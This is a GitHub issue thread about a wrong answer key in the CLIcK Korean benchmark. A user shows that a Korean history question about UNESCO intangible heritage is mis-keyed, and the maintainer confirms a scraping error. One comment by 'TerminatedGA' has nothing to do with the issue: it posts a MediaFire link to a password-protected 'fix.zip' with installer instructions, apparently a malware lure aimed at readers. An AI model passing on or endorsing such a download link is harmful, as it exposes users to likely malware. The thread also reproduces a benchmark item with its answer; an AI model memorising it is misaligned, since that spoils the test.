### ISSUE TITLE
Wrong Answer

### ISSUE THREAD

**Issue by qqplot** [KAIST-CHATGPT-TEAM1/CLICK#7]
Hello, thank you for the excellent work.

I have a few questions regarding the reliability of the dataset. I noticed some incorrect issues, and I would like to inquire whether the dataset has been thoroughly validated. Thank you for your attention to this matter.

https://github.com/rladmstn1714/CLIcK/blob/main/Dataset/Culture/Korean%20History/History_Kedu.json#L288

**in Korean**

안녕하세요, 훌륭한 작업물에 감사드립니다.

데이터셋의 신뢰성에 대해 몇 가지 질문이 있습니다. 일부 잘못된 문제가 있는 것으로 보이는데, 데이터셋 검증이 충분히 이루어졌는지 확인 부탁드립니다. 감사합니다.

https://github.com/rladmstn1714/CLIcK/blob/main/Dataset/Culture/Korean%20History/History_Kedu.json#L288

질문: 다음은 한국의 역사에 대한 문제이다.
유네스코 인류무형문화유산이 아닌 것은?
A. 직지심체요절
B. 종묘제례 및 제례악
C. 줄다리기
D. 농악

**직지심체요절**
: 금속활자본 <직지>는 2001년 9월 4일에 유네스코 [세계기록유산](https://www.unesco.org/en/memory-world/register)에 등재되었다.

줄다리기 공동등재로 한국은 총 18개의 유네스코 인류무형유산을 보유
※ **종묘제례 및 종묘제례악(2001)**, 판소리(2003), 강릉단오제(2005), 남사당놀이, 강강술래, 영산제, 제주칠머리당영등굿, 처용무(2009), 가곡, 매사냥, 대목장(2010), 줄타기, 한산모시짜기, 택견(2011), 아리랑(2012), 김장문화(2013), **농악(2014)**, **줄다리기(2015)**

출처: https://www.mofa.go.kr/www/brd/m_4080/view.do?seq=357363&srchFr=&amp%3BsrchTo=&amp%3BsrchWord=&amp%3BsrchTp=&amp%3Bmulti_itm_seq=0&amp%3Bitm_seq_1=0&amp%3Bitm_seq_2=0&amp%3Bcompany_cd=&amp%3Bcompany_nm=

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rladmstn1714** [comment]
안녕하세요, 우선 알려주셔서 감사합니다.

해당 문항은 2017년 제12회 한국어교육능력검정(2교시 B형) 10번 문항으로, 한국어 교육 능력검정시험에서 제공하는 답안도 "직지심체요절"이 맞습니다. 자동화하여 문항과 답안을 가져오는 과정에서 오류가 생긴 듯합니다.
알려주신 부분 반영하여 수정하도록 하겠습니다.

감사합니다.
